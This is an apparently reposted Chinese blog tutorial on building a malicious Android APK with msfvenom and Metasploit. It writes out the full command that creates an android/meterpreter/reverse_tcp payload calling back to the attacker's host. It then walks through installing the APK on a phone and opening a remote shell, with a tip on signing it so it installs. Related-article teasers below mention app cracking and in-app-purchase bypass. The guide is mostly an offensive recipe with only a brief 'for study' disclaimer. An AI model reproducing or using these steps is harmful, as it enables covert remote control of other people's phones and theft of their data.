利用Metasploit攻击Android

摘要:
首先我在Kali下生成一个Android的应用程序,即apk格式的文件,用到的命令是:msfvenom-pandroid/meterpreter/reverse_tcpLHOST=本地ipLPORT=监听端口R˃/root/rb.apk注释:-p:指的是在本次环境中攻击所使用的payload,这个payload就是将Android攻击成功之后的反弹连接发送到攻击者的终端上来;’LHOOST与LPO

首先我在Kali下生成一个Android的应用程序,即apk格式的文件,用到的命令是:

msfvenom -p android/meterpreter/reverse_tcp LHOST=本地ip LPORT=监听端口 R > /root/rb.apk

注释:-p:指的是在本次环境中攻击所使用的payload,这个payload就是将Android攻击成功之后的反弹连接发送到攻击者的终端上来;’

LHOOST与LPORT指的是本地反弹的ip地址与本地监听端口;

-R:表示要生成的文件类型;

> /root/rb.apk:表示生成文件的保存路径;

那么接下来就开始配置:

利用Metasploit攻击Android第1张

攻击端配置成功之后在手机端将之前生成好的apk文件导入手机中,然后供给端就开始exploit,则可以看出回话的连接状态:

利用Metasploit攻击Android第2张

选择连接会话,进入控制shell,则可以查看使得内容信息与版本信息:

利用Metasploit攻击Android第3张

注意:在将Kali里面生成的apk文件直接导入手机时可能会发生错误,那是因为apk文件缺少授权,所以我们下载一个制作签名的软件,给此文件进行授权,则就可以导入了

免责声明:文章转载自《利用Metasploit攻击Android》仅用于学习参考。如对内容有疑问,请及时联系本站处理。

上篇编程实践:使用java访问mySQL数据库说出一些常用的类,包,接口,请各举5个 ?下篇

宿迁高防,2C2G15M,22元/月;香港BGP,2C5G5M,25元/月 雨云优惠码:MjYwNzM=

相关文章

【转】Android APK的数字签名的作用和意义

1. 什么是数字签名? 数字签名就是为你的程序打上一种标记,来作为你自己的标识,当别人看到签名的时候会知道它是与你相关的     2. 为什么要数字签名? 最简单直接的回答: 系统要求的。  Android系统要求每一个Android应用程序必须要经过数字签名才能够安装到系统中,也就是说如果一个Android应用程序没有经过数字签名,是没有...

天天酷跑 破解全套教程 tips地图bin文件!

需要的工具:Android逆向助手,WinHex,ApkIDE,C32Asm,apk编辑器,mp3-ogg格式转换器教程开始:一.讲解apk文件解包。    1.我们到酷跑官网去下载一个正版酷跑文件,后缀名是.apk。之后在我们电脑上下载一个360压缩工具,并安装,下载地址:http://yasuo.360.cn/         <ignore_j...

如何加密android apk

      经过了忙碌的一周终于有时间静下来写点东西了,我们继续介绍android apk防止反编译技术的另一种方法。前两篇我们讲了加壳技术(http://my.oschina.net/u/2323218/blog/393372)和运行时修改字节码(http://my.oschina.net/u/2323218/blog/396203),如果有不明白的可以...

Android热修复之微信Tinker使用初探

  文章地址:Android热修复之微信Tinker使用初探 前几天,万众期待的微信团队的Android热修复框架tinker终于在GitHub上开源了。 地址:https://github.com/Tencent/tinker 官方介绍:https://my.oschina.net/shwenzhang/blog/751618 接入指南:https:/...

记某app内购破解 – 安卓逆向菜鸟的初体验

前言 因为某个机缘,我拿到一个赛车app,玩了一会想买个装备,居然要我掏钱包,作为一名cracker,我觉得我的尊严受到了严重的蔑视(无奈钱包空空),我觉得要捍卫我那脆弱的玻璃心(钱包),所以,开干吧。我搜索了网上相关的帖子,发现这个apk的破解都是讲了关键点都在哪里,没有具体的关键点查找思路,所以我重新自己破解了一次,中间多次误入歧途,我把自己的详细思路...

apk逆向工具总结

apk逆向工具 会一直持续更新工具的种类和版本,以后加上工具的使用介绍! APKToolKit 主要功能: 1、反编译.apk对.apk文件进行反编译。2、重建.apk根据反编译.apk得到目录重建.apk文件。3、签名.apk对.apk文件进行签名。4、优化.apk对.apk文件进行优化。5、framework-res.apk工具实现framework-...